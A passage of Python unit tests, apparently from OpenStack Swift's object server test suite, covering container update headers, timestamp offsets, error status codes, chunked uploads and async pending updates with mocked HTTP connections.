def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
# create a new object
create_timestamp = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test1',
headers={'X-Timestamp': create_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'Content-Type': 'text/plain'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Size': len('test1'),
'X-Etag': md5('test1').hexdigest(),
'X-Content-Type': 'text/plain',
'X-Timestamp': create_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back object
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'],
utils.Timestamp(create_timestamp).normal)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
create_timestamp)
self.assertEqual(resp.body, 'test1')
# send an update with an offset
offset_timestamp = utils.Timestamp(
create_timestamp, offset=1).internal
req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test2',
headers={'X-Timestamp': offset_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'Content-Type': 'text/html'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Size': len('test2'),
'X-Etag': md5('test2').hexdigest(),
'X-Content-Type': 'text/html',
'X-Timestamp': offset_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back new offset
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'],
utils.Timestamp(offset_timestamp).normal)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
offset_timestamp)
self.assertEqual(resp.body, 'test2')
# now overwrite with a newer time
overwrite_timestamp = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o', method='PUT', body='test3',
headers={'X-Timestamp': overwrite_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'Content-Type': 'text/enriched'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Size': len('test3'),
'X-Etag': md5('test3').hexdigest(),
'X-Content-Type': 'text/enriched',
'X-Timestamp': overwrite_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back overwrite
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['X-Timestamp'],
utils.Timestamp(overwrite_timestamp).normal)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
overwrite_timestamp)
self.assertEqual(resp.body, 'test3')
# delete with an offset
offset_delete = utils.Timestamp(overwrite_timestamp,
offset=1).internal
req = Request.blank('/sda1/p/a/c/o', method='DELETE',
headers={'X-Timestamp': offset_delete,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 204)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'DELETE')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': offset_delete,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back offset delete
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Timestamp'], None)
self.assertEqual(resp.headers['X-Backend-Timestamp'], offset_delete)
# and one more delete with a newer timestamp
delete_timestamp = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o', method='DELETE',
headers={'X-Timestamp': delete_timestamp,
'X-Container-Host': '10.0.0.1:8080',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p'})
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 404)
self.assertEqual(1, len(container_updates))
for update in container_updates:
ip, port, method, path, headers = update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '8080')
self.assertEqual(method, 'DELETE')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': delete_timestamp,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
container_updates = [] # reset
# read back delete
req = Request.blank('/sda1/p/a/c/o', method='GET')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Timestamp'], None)
self.assertEqual(resp.headers['X-Backend-Timestamp'], delete_timestamp)
def test_call_bad_request(self):
# Test swift.obj.server.ObjectController.__call__
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '400 ')
def test_call_not_found(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'GET',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '404 ')
def test_call_bad_method(self):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'INVALID',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_call_name_collision(self):
def my_check(*args):
return False
def my_hash_path(*args):
return md5('collide').hexdigest()
with mock.patch("swift.obj.diskfile.hash_path", my_hash_path):
with mock.patch("swift.obj.server.check_object_creation",
my_check):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'CONTENT_TYPE': 'text/html',
'HTTP_X_TIMESTAMP': normalize_timestamp(1.2),
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '201 ')
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/b/d/x',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'CONTENT_TYPE': 'text/html',
'HTTP_X_TIMESTAMP': normalize_timestamp(1.3),
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '403 ')
def test_invalid_method_doesnt_exist(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'method_doesnt_exist',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_invalid_method_is_not_public(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': '__init__',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_chunked_put(self):
listener = listen_zero()
port = listener.getsockname()[1]
killer = spawn(wsgi.server, listener, self.object_controller,
NullLogger())
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Content-Type: text/plain\r\n'
'Connection: close\r\nX-Timestamp: %s\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
1.0))
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 201'
self.assertEqual(headers[:len(exp)], exp)
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Connection: close\r\n\r\n')
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 200'
self.assertEqual(headers[:len(exp)], exp)
response = fd.read()
self.assertEqual(response, 'oh hai')
killer.kill()
def test_chunked_content_length_mismatch_zero(self):
listener = listen_zero()
port = listener.getsockname()[1]
killer = spawn(wsgi.server, listener, self.object_controller,
NullLogger())
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Content-Type: text/plain\r\n'
'Connection: close\r\nX-Timestamp: %s\r\n'
'Content-Length: 0\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
1.0))
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 201'
self.assertEqual(headers[:len(exp)], exp)
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Connection: close\r\n\r\n')
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 200'
self.assertEqual(headers[:len(exp)], exp)
response = fd.read()
self.assertEqual(response, 'oh hai')
killer.kill()
def test_max_object_name_length(self):
timestamp = normalize_timestamp(time())
max_name_len = constraints.MAX_OBJECT_NAME_LENGTH
req = Request.blank(
'/sda1/p/a/c/' + ('1' * max_name_len),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/' + ('2' * (max_name_len + 1)),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_max_upload_time(self):
class SlowBody(object):
def __init__(self):
self.sent = 0
def read(self, size=-1):
if self.sent < 4:
sleep(0.1)
self.sent += 1
return ' '
return ''
def set_hundred_continue_response_headers(*a, **kw):
pass
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.object_controller.max_upload_time = 0.1
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 408)
def test_short_body(self):
class ShortBody(object):
def __init__(self):
self.sent = False
def read(self, size=-1):
if not self.sent:
self.sent = True
return ' '
return ''
def set_hundred_continue_response_headers(*a, **kw):
pass
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': ShortBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 499)
def test_bad_sinces(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': 'Not a valid date'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': 'Not a valid date'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
too_big_date_list = list(datetime.datetime.max.timetuple())
too_big_date_list[0] += 1 # bump up the year
too_big_date = strftime(
"%a, %d %b %Y %H:%M:%S UTC", struct_time(too_big_date_list))
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': too_big_date})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_content_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
def test_async_update_http_connect(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
given_args = []
def fake_http_connect(*args):
given_args.extend(args)
raise Exception('test')
orig_http_connect = object_server.http_connect
try:
object_server.http_connect = fake_http_connect
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': 'set',
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
finally:
object_server.http_connect = orig_http_connect
self.assertEqual(
given_args,
['127.0.0.1', '1234', 'sdc1', 1, 'PUT', '/a/c/o', {
'x-timestamp': '1', 'x-out': 'set',
'user-agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy)}])
@patch_policies([StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(37, 'fantastico')])
def test_updating_multiple_delete_at_container_servers(self):
# update router post patch
self.object_controller._diskfile_router = diskfile.DiskFileRouter(
self.conf, self.object_controller.logger)
policy = random.choice(list(POLICIES))
self.object_controller.expiring_objects_account = 'exp'
self.object_controller.expiring_objects_container_divisor = 60
http_connect_args = []
def fake_http_connect(ipaddr, port, device, partition, method, path,
headers=None, query_string=None, ssl=False):
class SuccessfulFakeConn(object):
@property
def status(self):
return 200
def getresponse(self):
return self
def read(self):
return ''
captured_args = {'ipaddr': ipaddr, 'port': port,
'device': device, 'partition': partition,
'method': method, 'path': path, 'ssl': ssl,
'headers': headers, 'query_string': query_string}
http_connect_args.append(
dict((k, v) for k, v in captured_args.items()
if v is not None))
return SuccessfulFakeConn()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5',
'X-Container-Device': 'sdb1',
'X-Delete-At': 9999999999,
'X-Delete-At-Container': '9999999960',
'X-Delete-At-Host': "10.1.1.1:6201,10.2.2.2:6202",
'X-Delete-At-Partition': '6237',
'X-Delete-At-Device': 'sdp,sdq'})
with mock.patch.object(
object_server, 'http_connect', fake_http_connect):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
http_connect_args.sort(key=operator.itemgetter('ipaddr'))
self.assertEqual(len(http_connect_args), 3)
self.assertEqual(
http_connect_args[0],
{'ipaddr': '1.2.3.4',
'port': '5',
'path': '/a/c/o',
'device': 'sdb1',
'partition': '20',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'application/burrito',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy),
'x-trans-id': '-'})})
self.assertEqual(
http_connect_args[1],
{'ipaddr': '10.1.1.1',
'port': '6201',
'path': '/exp/9999999960/9999999999-a/c/o',
'device': 'sdp',
'partition': '6237',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'text/plain',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
'x-trans-id': '-'})})
self.assertEqual(
http_connect_args[2],
{'ipaddr': '10.2.2.2',
'port': '6202',
'path': '/exp/9999999960/9999999999-a/c/o',
'device': 'sdq',
'partition': '6237',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'text/plain',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
'x-trans-id': '-'})})
@patch_policies([StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(26, 'twice-thirteen')])
def test_updating_multiple_container_servers(self):
# update router post patch
self.object_controller._diskfile_router = diskfile.DiskFileRouter(
self.conf, self.object_controller.logger)
http_connect_args = []
def fake_http_connect(ipaddr, port, device, partition, method, path,
headers=None, query_string=None, ssl=False):
class SuccessfulFakeConn(object):
@property
def status(self):
return 200
def getresponse(self):
return self
def read(self):
return ''
captured_args = {'ipaddr': ipaddr, 'port': port,
'device': device, 'partition': partition,
'method': method, 'path': path, 'ssl': ssl,
'headers': headers, 'query_string': query_string}
http_connect_args.append(
dict((k, v) for k, v in captured_args.items()
if v is not None))
return SuccessfulFakeConn()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': '26',
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5, 6.7.8.9:10',
'X-Container-Device': 'sdb1, sdf1'})
with mock.patch.object(
object_server, 'http_connect', fake_http_connect):
with fake_spawn():
req.get_response(self.object_controller)
http_connect_args.sort(key=operator.itemgetter('ipaddr'))
self.assertEqual(len(http_connect_args), 2)
self.assertEqual(
http_connect_args[0],
{'ipaddr': '1.2.3.4',
'port': '5',
'path': '/a/c/o',
'device': 'sdb1',
'partition': '20',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'application/burrito',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'X-Backend-Storage-Policy-Index': '26',
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
'x-trans-id': '-'})})
self.assertEqual(
http_connect_args[1],
{'ipaddr': '6.7.8.9',
'port': '10',
'path': '/a/c/o',
'device': 'sdf1',
'partition': '20',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'application/burrito',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'X-Backend-Storage-Policy-Index': '26',
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
'x-trans-id': '-'})})
def test_object_delete_at_async_update(self):
policy = random.choice(list(POLICIES))
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
put_timestamp = next(self.ts).internal
delete_at_timestamp = utils.normalize_delete_at_timestamp(
next(self.ts).normal)
delete_at_container = (
int(delete_at_timestamp) /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'X-Container-Host': '10.0.0.1:6201',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'X-Delete-At': delete_at_timestamp,
'X-Delete-At-Container': delete_at_container,
'X-Delete-At-Partition': 'p',
'X-Delete-At-Host': '10.0.0.2:6202',
'X-Delete-At-Device': 'sda1',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
req = Request.blank(
'/sda1/p/a/c/o', method='PUT', body='', headers=headers)
with mocked_http_conn(
500, 500, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(2, len(container_updates))
delete_at_update, container_update = container_updates
# delete_at_update
ip, port, method, path, headers = delete_at_update
self.assertEqual(ip, '10.0.0.2')
self.assertEqual(port, '6202')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/.expiring_objects/%s/%s-a/c/o' %
(delete_at_container, delete_at_timestamp))
expected = {
'X-Timestamp': put_timestamp,
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
# container_update
ip, port, method, path, headers = container_update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '6201')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': put_timestamp,
'X-Backend-Storage-Policy-Index': int(policy),
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
# check async pendings
async_dir = os.path.join(self.testdir, 'sda1',
diskfile.get_async_dir(policy))
found_files = []
for root, dirs, files in os.walk(async_dir):
for f in files:
async_file = os.path.join(root, f)
found_files.append(async_file)
data = pickle.load(open(async_file))
if data['account'] == 'a':
self.assertEqual(
int(data['headers']
['X-Backend-Storage-Policy-Index']), int(policy))
elif data['account'] == '.expiring_objects':
self.assertEqual(
int(data['headers']
['X-Backend-Storage-Policy-Index']), 0)
else:
self.fail('unexpected async pending data')
self.assertEqual(2, len(found_files))
def test_async_update_saves_on_exception(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(*args):
raise Exception('test')
orig_http_connect = object_server.http_connect
try:
object_server.http_connect = fake_http_connect
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': 'set',
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
async_dir = diskfile.get_async_dir(policy)
self.assertEqual(
pickle.load(open(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal))),
{'headers': {'x-timestamp': '1', 'x-out': 'set',
'user-agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy)},
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
def test_async_update_saves_on_non_2xx(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(status):
class FakeConn(object):
def __init__(self, status):
self.status = status
def getresponse(self):
return self
def read(self):
return ''
return lambda *args: FakeConn(status)
orig_http_connect = object_server.http_connect
try:
for status in (199, 300, 503):
object_server.http_connect = fake_http_connect(status)
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status),
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
async_dir = diskfile.get_async_dir(policy)
self.assertEqual(
pickle.load(open(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal))),
{'headers': {'x-timestamp': '1', 'x-out': str(status),
'user-agent':
'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index':
int(policy)},
'account': 'a', 'container': 'c', 'obj': 'o',
'op': 'PUT'})
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_async_update_does_not_save_on_2xx(self):
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(status):
class FakeConn(object):
def __init__(self, status):
self.status = status
def getresponse(self):
return self
def read(self):
return ''
return lambda *args: FakeConn(status)
orig_http_connect = object_server.http_connect
try:
for status in (200, 299):
object_server.http_connect = fake_http_connect(status)
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status)}, 'sda1', 0)
self.assertFalse(
os.path.exists(os.path.join(
self.testdir, 'sda1', 'async_pending', 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-0000000001.00000')))
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_async_update_saves_on_timeout(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect():
class FakeConn(object):
def getresponse(self):
return sleep(1)
